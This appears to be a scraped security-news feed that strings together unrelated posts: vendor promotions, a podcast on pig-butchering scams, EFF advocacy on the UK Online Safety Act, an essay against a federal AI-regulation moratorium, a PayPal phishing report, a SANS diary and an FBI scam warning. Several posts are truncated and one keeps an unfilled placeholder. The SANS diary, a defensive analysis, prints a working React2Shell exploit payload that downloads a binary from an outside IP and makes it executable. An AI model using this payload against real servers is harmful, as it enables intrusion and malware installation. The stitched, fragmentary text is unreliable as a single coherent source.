Threat actors use sophisticated techniques like prompt injection to trick sanctioned AI platforms into ignoring their guardrails. The prompt-level visibility and real-time analysis you get with Tenable AI Exposure can pinpoint these novel attacks and score their severity, enabling your security team to prioritize and remediate the most critical exposure pathways within your enterprise environment. In addition, AI Exposure helps you uncover AI misconfiguration that could allow connections to an unvetted third-party tool or unintentionally make an agent meant only for internal use publicly available. Fixing such misconfigurations reduces the risks of data leaks and exfiltration.
The static, rule-based approach of traditional data loss prevention (DLP) tools can’t manage non-deterministic AI outputs or novel attacks, which leaves gaps through which sensitive information can exit your organization. Tenable AI Exposure fills these gaps by monitoring AI interactions and workflows. It uses a number of machine learning and deep learning AI models to learn about new attack techniques based on the semantic and policy-violating intent of the interaction, not just simple keywords. This can then help inform other blocking solutions as part of your mitigation actions. For a deeper look at the challenges of preventing data leakage, read [add blog title, URL when ready].
The post Security for AI: How Shadow AI, Platform Risks, and Data Leakage Leave Your Organization Exposed appeared first on Security Boulevard.
Campus Technology & THE Journal Name Cloud Monitor as Winner in the Cybersecurity Risk Management Category BOULDER, Colo.—December 15, 2025—ManagedMethods, the leading provider of cybersecurity, safety, web filtering, and classroom management solutions for K-12 schools, is pleased to announce that Cloud Monitor has won in this year’s Campus Technology & THE Journal 2025 Product of ...
The post Cloud Monitor Wins Cybersecurity Product of the Year 2025 appeared first on ManagedMethods Cybersecurity, Safety & Compliance for K-12.
The post Cloud Monitor Wins Cybersecurity Product of the Year 2025 appeared first on Security Boulevard.
This week on the Lock and Code podcast…
This is the story of the world’s worst scam and how it is being used to fuel entire underground economies that have the power to rival nation-states across the globe. This is the story of “pig butchering.”
“Pig butchering” is a violent term that is used to describe a growing type of online investment scam that has ruined the lives of countless victims all across the world. No age group is spared, nearly no country is untouched, and, if the numbers are accurate, with more than $6.5 billion stolen in 2024 alone, no scam may be more serious today than this.
Despite this severity, like many types of online fraud today, most pig-butchering scams start with a simple “hello.”
Sent through text or as a direct message on social media platforms like X, Facebook, Instagram, or elsewhere, these initial communications are often framed as simple mistakes—a kind stranger was given your number by accident, and if you reply, you’re given a kind apology and a simple lure: “You seem like such a kind person… where are you from?”
Here, the scam has already begun. Pig butchers, like romance scammers, build emotional connections with their victims. For months, their messages focus on everyday life, from family to children to marriage to work.
But, with time, once the scammer believes they’ve gained the trust of their victim, they launch their attack: An investment “opportunity.”
Pig butchers tell their victims that they’ve personally struck it rich by investing in cryptocurrency, and they want to share the wealth. Here, the scammers will lead their victims through opening an entirely bogus investment account, which is made to look real through sham websites that are littered with convincing tickers, snazzy analytics, and eye-popping financial returns.
When the victims “invest” in these accounts, they’re actually giving money directly to their scammers. But when the victims log into their online “accounts,” they see their money growing and growing, which convinces many of them to invest even more, perhaps even until their life savings are drained.
This charade goes on as long as possible until the victims learn the truth and the scammers disappear. The continued theft from these victims is where “pig-butchering” gets its name—with scammers fattening up their victims before slaughter.
Today, on the Lock and Code podcast with host David Ruiz, we speak with Erin West, founder of Operation Shamrock and former Deputy District Attorney of Santa Clara County, about pig butchering scams, the failures of major platforms like Meta to stop them, and why this global crisis represents far more than just a few lost dollars.
“It’s really the most compelling, horrific, humanitarian global crisis that is happening in the world today.”
Tune in today to listen to the full conversation.
Show notes and credits:
Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)
Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.
Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium Security for Lock and Code listeners.
Since the Online Safety Act took effect in late July, UK internet users have made it very clear to their politicians that they do not want anything to do with this censorship regime. Just days after age checks came into effect, VPN apps became the most downloaded on Apple's App Store in the UK, and a petition calling for the repeal of the Online Safety Act (OSA) hit over 400,000 signatures.
In the months since, more than 550,000 people have petitioned Parliament to repeal or reform the Online Safety Act, making it one of the largest public expressions of concern about a UK digital law in recent history. The OSA has galvanized swathes of the UK population, and it’s high time for politicians to take that seriously.
Last week, EFF joined Open Rights Group, Big Brother Watch, and Index on Censorship in sending a briefing to UK politicians urging them to listen to their constituents and repeal the Online Safety Act ahead of this week’s Parliamentary petition debate on 15 December.
The legislation is a threat to user privacy, restricts free expression by arbitrating speech online, exposes users to algorithmic discrimination through face checks, and effectively blocks millions of people without a personal device or form of ID from accessing the internet. The briefing highlights how, in the months since the OSA came into effect, we have seen the legislation:
Our briefing continues:
“Those raising concerns about the Online Safety Act are not opposing child safety. They are asking for a law that does both: protects children and respects fundamental rights, including children’s own freedom of expression rights.”
The petition shows that hundreds of thousands of people feel the current Act tilts too far, creating unnecessary risks for free expression and ordinary online life. With sensible adjustments, Parliament can restore confidence that online safety and freedom of expression rights can coexist.
If the UK really wants to achieve its goal of being the safest place in the world to go online, it must lead the way in introducing policies that actually protect all users—including children—rather than pushing the enforcement of legislation that harms the very people it was meant to protect.
Read the briefing in full here.

Cast your mind back to May of this year: Congress was in the throes of debate over the massive budget bill. Amidst the many seismic provisions, Senator Ted Cruz dropped a ticking time bomb of tech policy: a ten-year moratorium on the ability of states to regulate artificial intelligence. To many, this was catastrophic. The few massive AI companies seem to be swallowing our economy whole: their energy demands are overriding household needs, their data demands are overriding creators’ copyright, and their products are triggering mass unemployment as well as new types of clinical psychoses. In a moment where Congress is seemingly unable to act to pass any meaningful consumer protections or market regulations, why would we hamstring the one entity evidently capable of doing so—the states? States that have already enacted consumer protections and other AI regulations, like California, and those actively debating them, like Massachusetts, were alarmed. Seventeen Republican governors wrote a letter decrying the idea, and it was ultimately killed in a rare vote of bipartisan near-unanimity.
The idea is back. Before Thanksgiving, a House Republican leader suggested they might slip it into the annual defense spending bill. Then, a draft document leaked outlining the Trump administration’s intent to enforce the state regulatory ban through executive powers. An outpouring of opposition (including from some Republican state leaders) beat back that notion for a few weeks, but on Monday, Trump posted on social media that the promised Executive Order is indeed coming soon. That would put a growing cohort of states, including California and New York, as well as Republican strongholds like Utah and Texas, in jeopardy.
The constellation of motivations behind this proposal is clear: conservative ideology, cash, and China.
The intellectual argument in favor of the moratorium is that “freedom”-killing state regulation on AI would create a patchwork that would be difficult for AI companies to comply with, which would slow the pace of innovation needed to win an AI arms race with China. AI companies and their investors have been aggressively peddling this narrative for years now, and are increasingly backing it with exorbitant lobbying dollars. It’s a handy argument, useful not only to kill regulatory constraints, but also—companies hope—to win federal bailouts and energy subsidies.
Citizens should parse that argument from their own point of view, not Big Tech’s. Preventing states from regulating AI means that those companies get to tell Washington what they want, but your state representatives are powerless to represent your own interests. Which freedom is more important to you: the freedom for a few near-monopolies to profit from AI, or the freedom for you and your neighbors to demand protections from its abuses?
There is an element of this that is more partisan than ideological. Vice President J.D. Vance argued that federal preemption is needed to prevent “progressive” states from controlling AI’s future. This is an indicator of creeping polarization, where Democrats decry the monopolism, bias, and harms attendant to corporate AI and Republicans reflexively take the opposite side. It doesn’t help that some in the parties also have direct financial interests in the AI supply chain.
But this does not need to be a partisan wedge issue: both Democrats and Republicans have strong reasons to support state-level AI legislation. Everyone shares an interest in protecting consumers from harm created by Big Tech companies. In leading the charge to kill Cruz’s initial AI moratorium proposal, Republican Senator Marsha Blackburn explained that “This provision could allow Big Tech to continue to exploit kids, creators, and conservatives … we can’t block states from making laws that protect their citizens.” More recently, Florida Governor Ron DeSantis has said he wants to regulate AI in his state.
The often-heard complaint that it is hard to comply with a patchwork of state regulations rings hollow. Pretty much every other consumer-facing industry has managed to deal with local regulation—automobiles, children’s toys, food, and drugs—and those regulations have been effective consumer protections. The AI industry includes some of the most valuable companies globally and has demonstrated the ability to comply with differing regulations around the world, including the EU’s AI and data privacy regulations, substantially more onerous than those so far adopted by US states. If we can’t leverage state regulatory power to shape the AI industry, to what industry could it possibly apply?
The regulatory superpower that states have here is not size and force, but rather speed and locality. We need the “laboratories of democracy” to experiment with different types of regulation that fit the specific needs and interests of their constituents and evolve responsively to the concerns they raise, especially in an area as consequential and rapidly changing as AI.
We should embrace the ability of regulation to be a driver—not a limiter—of innovation. Regulations don’t restrict companies from building better products or making more profit; they help channel that innovation in specific ways that protect the public interest. Drug safety regulations don’t prevent pharma companies from inventing drugs; they force them to invent drugs that are safe and efficacious. States can direct private innovation to serve the public.
But, most importantly, regulations are needed to prevent the most dangerous impact of AI today: the concentration of power associated with trillion-dollar AI companies and the power-amplifying technologies they are producing. We outline the specific ways that the use of AI in governance can disrupt existing balances of power, and how to steer those applications towards more equitable balances, in our new book, Rewiring Democracy. In the nearly complete absence of Congressional action on AI over the years, it has swept the world’s attention; it has become clear that states are the only effective policy levers we have against that concentration of power.
Instead of impeding states from regulating AI, the federal government should support them to drive AI innovation. If proponents of a moratorium worry that the private sector won’t deliver what they think is needed to compete in the new global economy, then we should engage government to help generate AI innovations that serve the public and solve the problems most important to people. Following the lead of countries like Switzerland, France, and Singapore, the US could invest in developing and deploying AI models designed as public goods: transparent, open, and useful for tasks in public administration and governance.
Maybe you don’t trust the federal government to build or operate an AI tool that acts in the public interest? We don’t either. States are a much better place for this innovation to happen because they are closer to the people, they are charged with delivering most government services, they are better aligned with local political sentiments, and they have achieved greater trust. They’re where we can test, iterate, compare, and contrast regulatory approaches that could inform eventual and better federal policy. And, while the costs of training and operating performant AI tools like large language models have declined precipitously, the federal government can play a valuable role here in funding cash-strapped states to lead this kind of innovation.
This essay was written with Nathan E. Sanders, and originally appeared in Gizmodo.
EDITED TO ADD: Trump signed an executive order banning state-level AI regulations hours after this was published. This is not going to be the last word on the subject.
After an investigation by BleepingComputer, PayPal closed a loophole that allowed scammers to send emails from the legitimate service@paypal.com email address.
Following reports from people who received emails claiming an automatic payment had been cancelled, BleepingComputer found that cybercriminals were abusing a PayPal feature that allows merchants to pause a customer’s subscription.
The scammers created a PayPal subscription and then paused it, which triggers PayPal’s genuine “Your automatic payment is no longer active” notification to the subscriber. They also set up a fake subscriber account, likely a Google Workspace mailing list, which automatically forwards any email it receives to all other group members.
This allowed the criminals to use a similar method to one we’ve described before, but this time with the legitimate service@paypal.com address as the sender, bypassing email filters and a first casual check by the recipient.

“Your automatic payment is no longer active
You’ll need to contact Sony U.S.A. for more details or to reactivate your automatic payments. Here are the details:”
BleepingComputer says there are slight variations in formatting and in the phone numbers to call, but in essence the emails are all based on this method.
To create urgency, the scammers made the emails look as though the target had been charged for some high-end, expensive device. They also added a fake “PayPal Support” phone number, encouraging targets to call if they wanted to cancel the payment or had questions.
In this type of tech support scam, the target calls the listed number, and the “support agent” on the other end asks to remotely log in to their computer to check for supposed viruses. They might run a short program to open command prompts and folders, just to scare and distract the victim. Then they’ll ask to install another tool to “fix” things, which will search the computer for anything they can turn into money. Others will sell you fake protection software and bill you for their services. Either way, the result is the same: the victim loses money.
PayPal contacted BleepingComputer to let them know they were closing the loophole:
“We are actively mitigating this matter, and encourage people to always be vigilant online and mindful of unexpected messages. If customers suspect they are a target of a scam, we recommend they contact Customer Support directly through the PayPal app or our Contact page for assistance.”
The best way to stay safe is to stay informed about the tricks scammers use. Learn to spot the red flags that almost always give away scams and phishing emails, and remember:
If you’ve already fallen victim to a tech support scam:
Pro tip: Malwarebytes Scam Guard recognized this email as a scam. Upload any suspicious text, emails, attachments and other files to ask for its opinion. It’s really very good at recognizing scams. Here’s what it reported back for this particular scam:

“Suspicious Email Assessment
This email appears to be a phishing attempt designed to trick you into contacting scammers via a fake customer service number, a suspicious website, or email address. Here’s a breakdown of key warning signs:
Red Flags Detected
- Fake or Spoofed Sender Address
- While it says “service@paypal.com”, sender addresses can be easily spoofed. The real test is the content and behavior of the message, not just the visible address.
- Suspicious URLs
- Links like http://sonyusa.store and [sonyusa.store] (both non-official and unrelated to PayPal or Sony).
- Official PayPal links always use paypal.com domain.
- Non-Official Customer Service Email
- Email provided is sony12service@gmail.com instead of an official Sony or PayPal domain.
- Urgency and Threat of Unauthorized Charges
- Creates panic by telling you a large payment was processed and prompts you to act quickly by contacting their “support” number or email.
- Phone Number Trap
- The number provided (805-500-6377) is likely operated by scammers. Real PayPal will never ask you to contact them via generic phone numbers outside of their secure website.
- Unusual Formatting and Grammar
- Awkward phrasing and formatting errors are common in scams.”
We don’t just report on scams—we help detect them
Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard, a feature of our mobile protection products. Submit a screenshot, paste suspicious content, or share a text or phone number, and we’ll tell you if it’s a scam or legit. Download Malwarebytes Mobile Security for iOS or Android and try it today!
Exploits for React2Shell (CVE-2025-55182) remain active. However, at this point, I would think that any servers vulnerable to the "plain" exploit attempts have already been exploited several times. Here is today's most popular exploit payload:
------WebKitFormBoundaryxtherespoopalloverme
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',r=>r.pipe(process.mainModule.require('fs').createWriteStream('/dev/shm/lrt').on('finish',()=>process.mainModule.require('fs').chmodSync('/dev/shm/lrt',0o755))));","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryxtherespoopalloverme
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryxtherespoopalloverme
------WebKitFormBoundaryxtherespoopalloverme--
To make the key components more readable:
process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',
r=>r.pipe(process.mainModule.require('fs').
createWriteStream('/dev/shm/lrt').on('finish'
This statement downloads the binary from 51.81.104.115 into a local file, /dev/shm/lrt.
process.mainModule.require('fs').chmodSync('/dev/shm/lrt',0o755))));
And then the file is marked as executable. It is unclear whether it is ever explicitly executed. The VirusTotal summary is somewhat ambiguous regarding the binary, identifying it as either adware or a miner [1]. Currently, this is the most common exploit variant we see for React2Shell.
Other versions of the exploit use /dev/lrt and /tmp/lrt instead of /dev/shm/lrt to store the malware.
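As a hedged illustration (not part of any official SANS or Rapid7 tooling), a short Python sketch can flag executable files dropped into the scratch directories named above, which is a quick triage check for this family of payloads:

```python
import os
import stat

# Directories used by the exploit variants described above
SCRATCH_DIRS = ["/dev/shm", "/tmp", "/dev"]

def find_executables(directory):
    """Return regular files in `directory` with any execute bit set."""
    hits = []
    try:
        entries = os.listdir(directory)
    except OSError:
        return hits  # missing or unreadable directory
    for name in entries:
        path = os.path.join(directory, name)
        try:
            st = os.lstat(path)  # lstat: do not follow symlinks
        except OSError:
            continue
        is_exec = st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
        if stat.S_ISREG(st.st_mode) and is_exec:
            hits.append(path)
    return hits

if __name__ == "__main__":
    for d in SCRATCH_DIRS:
        for path in find_executables(d):
            print(f"executable in scratch dir: {path}")
```

Executables in these locations are not proof of compromise (some software legitimately stages files there), but anything matching the `lrt` filenames from this campaign deserves a closer look.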
/dev/shm and /tmp are typically world-writable and should always work for this purpose. Writing to /dev itself requires root privileges, and these days it is unlikely for a web application to run as root. One recommendation for hardening Linux systems is to create /tmp as its own partition and mount it "noexec" to prevent it from being used as scratch space to run exploit code. But this can be tough to implement, as "normal" processes sometimes run code from /tmp (not pretty, but it happens often enough).
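A minimal sketch of that hardening step (the size and option set are placeholders; any workload that legitimately executes from /tmp will break under noexec, so test first):

```shell
# Illustrative /etc/fstab entry: mount /tmp as its own tmpfs with noexec
tmpfs   /tmp   tmpfs   defaults,noexec,nosuid,nodev,size=1G   0 0

# Apply to a running system (as root); verify nothing breaks before
# making the change permanent
mount -o remount,noexec,nosuid,nodev /tmp
```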
[1] https://www.virustotal.com/gui/file/895f8dff9cd26424b691a401c92fa7745e693275c38caf6a6aff277eadf2a70b/detection
--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
The post Against the Federal Moratorium on State-Level Regulation of AI appeared first on Security Boulevard.
This is the third installment in our four-part 2025 Year-End Roundtable. In Part One, we explored how accountability got personal. In Part Two, we examined how regulatory mandates clashed with operational complexity.
Now … (more…)
The post LW ROUNDTABLE: Part 3, Cyber resilience faltered in 2025 — recalibration now under way first appeared on The Last Watchdog.
The post LW ROUNDTABLE: Part 3, Cyber resilience faltered in 2025 — recalibration now under way appeared first on Security Boulevard.
Navigating the Most Complex Regulatory Landscapes in Cybersecurity Financial services and healthcare organizations operate under the most stringent regulatory frameworks in existence. From HIPAA and PCI-DSS to GLBA, SOX, and emerging regulations like DORA, these industries face a constant barrage of compliance requirements that demand not just checkboxes, but comprehensive, continuously monitored security programs. The
The post Compliance-Ready Cybersecurity for Finance and Healthcare: The Seceon Advantage appeared first on Seceon Inc.
The post Compliance-Ready Cybersecurity for Finance and Healthcare: The Seceon Advantage appeared first on Security Boulevard.
The cybersecurity battlefield has changed. Attackers are faster, more automated, and more persistent than ever. As businesses shift to cloud, remote work, SaaS, and distributed infrastructure, their security needs have outgrown traditional IT support. This is the turning point: Managed Service Providers (MSPs) are evolving into full-scale Managed Security Service Providers (MSSPs) – and the ones
The post Managed Security Services 2.0: How MSPs & MSSPs Can Dominate the Cybersecurity Market in 2025 appeared first on Seceon Inc.
The post Managed Security Services 2.0: How MSPs & MSSPs Can Dominate the Cybersecurity Market in 2025 appeared first on Security Boulevard.
Launching an AI initiative without a robust data strategy and governance framework is a risk many organizations underestimate. Most AI projects often stall, deliver poor...Read More
The post Can Your AI Initiative Count on Your Data Strategy and Governance? appeared first on ISHIR | Custom AI Software Development Dallas Fort-Worth Texas.
The post Can Your AI Initiative Count on Your Data Strategy and Governance? appeared first on Security Boulevard.
Learn why modern SaaS platforms are adopting passwordless authentication to improve security, user experience, and reduce breach risks.
The post Why Modern SaaS Platforms Are Switching to Passwordless Authentication appeared first on Security Boulevard.
Most enterprise breaches no longer begin with a firewall failure or a missed patch. They begin with an exposed identity. Credentials harvested from infostealers. Employee logins sold on criminal forums. Executive personas impersonated to trigger wire fraud. Customer identities stitched together from scattered exposures. The modern breach path is identity-first — and that shift …
The post Identity Risk Is Now the Front Door to Enterprise Breaches (and How Digital Risk Protection Stops It Early) appeared first on Security Boulevard.
Join us in the midst of the holiday shopping season as we discuss a growing privacy problem: tracking pixels embedded in marketing emails. According to Proton’s latest Spam Watch 2025 report, nearly 80% of promotional emails now contain trackers that report back your email activity. We discuss how these trackers work, why they become more […]
The post The Hidden Threat in Your Holiday Emails: Tracking Pixels and Privacy Concerns appeared first on Shared Security Podcast.
The post The Hidden Threat in Your Holiday Emails: Tracking Pixels and Privacy Concerns appeared first on Security Boulevard.
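The trackers discussed in the episode are typically tiny remote images embedded in an email's HTML: when the mail client fetches the image, the sender learns the message was opened. As a minimal sketch (using only the Python standard library; the `tracker.example` URL and the 1×1 size heuristic are illustrative assumptions, not details from the report), a scanner for such pixels might look like this:

```python
from html.parser import HTMLParser

class PixelFinder(HTMLParser):
    """Flags <img> tags whose declared size is 0x0 or 1x1 —
    the classic shape of an email tracking pixel."""
    def __init__(self):
        super().__init__()
        self.suspects = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        a = dict(attrs)  # attrs arrives as a list of (name, value) tuples
        w, h = a.get("width", ""), a.get("height", "")
        # Tiny or zero-sized remote images are loaded for the side effect
        # (the HTTP request), not for display.
        if w in ("0", "1") and h in ("0", "1"):
            self.suspects.append(a.get("src", ""))

# Hypothetical promotional email body with an embedded tracker:
email_html = (
    '<p>Holiday sale!</p>'
    '<img src="https://tracker.example/open?id=abc123" width="1" height="1">'
)
finder = PixelFinder()
finder.feed(email_html)
print(finder.suspects)
```

Real trackers often omit width/height attributes and hide via CSS instead, so a size heuristic alone will miss some; blocking remote image loads, as privacy-focused mail clients do, is the more robust defense the episode alludes to.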
The FBI Anchorage Field Office has issued a public warning after seeing a sharp increase in fraud cases targeting residents across Alaska. According to federal authorities, scammers are posing as law enforcement officers and government officials in an effort to extort money or steal sensitive personal information from unsuspecting victims.
The warning comes as reports continue to rise involving unsolicited phone calls where criminals falsely claim to represent agencies such as the FBI or other local, state, and federal law enforcement bodies operating in Alaska. These scams fall under a broader category of law enforcement impersonation scams, which rely heavily on fear, urgency, and deception.
Scammers typically contact victims using spoofed phone numbers that appear legitimate. In many cases, callers accuse individuals of failing to report for jury duty or missing a court appearance. Victims are then told that an arrest warrant has been issued in their name.
To avoid immediate arrest or legal consequences, the caller demands payment of a supposed fine. Victims are pressured to act quickly, often being told they must resolve the issue immediately. According to the FBI, these criminals may also provide fake court documents or reference personal details about the victim to make the scam appear more convincing.
In more advanced cases, scammers may use artificial intelligence tools to enhance their impersonation tactics. This includes generating realistic voices or presenting professionally formatted documents that appear to come from official government sources. These methods have contributed to the growing sophistication of government impersonation scams nationwide.
Authorities note that these scams most often occur through phone calls and emails. Criminals commonly use aggressive language and insist on speaking only with the targeted individual. Victims are often told not to discuss the call with family members, friends, banks, or law enforcement agencies.
Payment requests are another key red flag. Scammers typically demand money through methods that are difficult to trace or reverse. These include cash deposits at cryptocurrency ATMs, prepaid gift cards, wire transfers, or direct cryptocurrency payments. The FBI has emphasized that legitimate government agencies never request payment through these channels.
The FBI has reiterated that it does not call members of the public to demand payment or threaten arrest over the phone. Any call claiming otherwise should be treated as fraudulent. This clarification is central to the scam warning Alaska residents are being urged to take seriously.
Data from the FBI’s Internet Crime Complaint Center (IC3) highlights the scale of the problem. In 2024 alone, IC3 received more than 17,000 complaints related to government impersonation scams across the United States. Reported losses from these incidents exceeded $405 million nationwide.
Alaska has not been immune. Reported victim losses in the state surpassed $1.3 million, underscoring the financial and emotional impact these scams can have on individuals and families.
To reduce the risk of falling victim, the FBI urges residents to “take a beat” before responding to any unsolicited communication. Individuals should resist pressure tactics and take time to verify claims independently.
The FBI strongly advises against sharing or confirming personally identifiable information with anyone contacted unexpectedly. Alaskans are also cautioned never to send money, gift cards, cryptocurrency, or other assets in response to unsolicited demands.
Anyone who believes they may have been targeted or victimized should immediately stop communicating with the scammer. Victims should notify their financial institutions, secure their accounts, contact local law enforcement, and file a complaint with the FBI’s Internet Crime Complaint Center at www.ic3.gov. Prompt reporting can help limit losses and prevent others from being targeted.